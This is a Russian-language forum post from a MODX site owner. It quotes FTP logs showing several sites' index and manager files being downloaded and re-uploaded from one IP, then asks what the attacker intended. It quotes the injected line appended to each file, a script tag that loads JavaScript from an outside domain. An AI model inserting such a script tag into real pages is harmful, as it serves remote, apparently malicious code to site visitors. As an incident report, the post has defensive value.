Что хотели сделать?

Ситуация следующая: есть несколько сайтов на modx. Сегодня, после того, как не получилось зайти в админку и выяснения сложившейся ситуации с хостером, получил логи такого вида

Tue Jun 9 23:14:49 2009 0 217.116.8.82 5528 /home/логин/сайт2/www/index.php a _ o r логин ftp 0 * c

Tue Jun 9 23:14:49 2009 0 217.116.8.82 5614 /home/логин/сайт2/www/index.php a _ i r логин ftp 0 * c

Tue Jun 9 23:14:49 2009 0 217.116.8.82 873 /home/логин/сайт2/www/assets/index.html a _ o r логин ftp 0 * c

Tue Jun 9 23:14:53 2009 0 217.116.8.82 959 /home/логин/сайт2/www/assets/index.html a _ i r логин ftp 0 * c

Tue Jun 9 23:14:57 2009 0 217.116.8.82 38278 /home/логин/сайт2/www/manager/index.php a _ o r логин ftp 0 * c

Tue Jun 9 23:14:58 2009 0 217.116.8.82 38364 /home/логин/сайт2/www/manager/index.php a _ i r логин ftp 0 * c

Tue Jun 9 23:14:58 2009 0 217.116.8.82 1100 /home/логин/сайт3/www/index.php a _ o r логин ftp 0 * c

Tue Jun 9 23:14:58 2009 0 217.116.8.82 1186 /home/логин/сайт3/www/index.php a _ i r логин ftp 0 * c

Tue Jun 9 23:14:59 2009 0 217.116.8.82 4724 /home/логин/сайт4.ru/www/index.php a _ o r логин ftp 0 * c

Tue Jun 9 23:14:59 2009 0 217.116.8.82 4811 /home/логин/сайт4.ru/www/index.php a _ i r логин ftp 0 * c

Tue Jun 9 23:14:59 2009 0 217.116.8.82 70 /home/логин/сайт4.ru/www/assets/index.html a _ o r логин ftp 0 * c

Tue Jun 9 23:15:00 2009 0 217.116.8.82 157 /home/логин/сайт4.ru/www/assets/index.html a _ i r логин ftp 0 * c

Tue Jun 9 23:15:01 2009 0 217.116.8.82 37475 /home/логин/сайт4.ru/www/manager/index.php a _ o r логин ftp 0 * c

Tue Jun 9 23:15:02 2009 0 217.116.8.82 37562 /home/логин/сайт4.ru/www/manager/index.php a _ i r логин ftp 0 * c

и т.д. по всем сайтам.

После сравнения замененных файлов с исходными, оказалось, что все 3 отличаются только 1 добавленной строкой (была добавлена в самый конец всех файлов) -

<script LANGUAGE="javascript" SRC="http://www.difusionjuridica.es/img/top.js"></script>

p.s. если тема не в том разделе, прошу перенести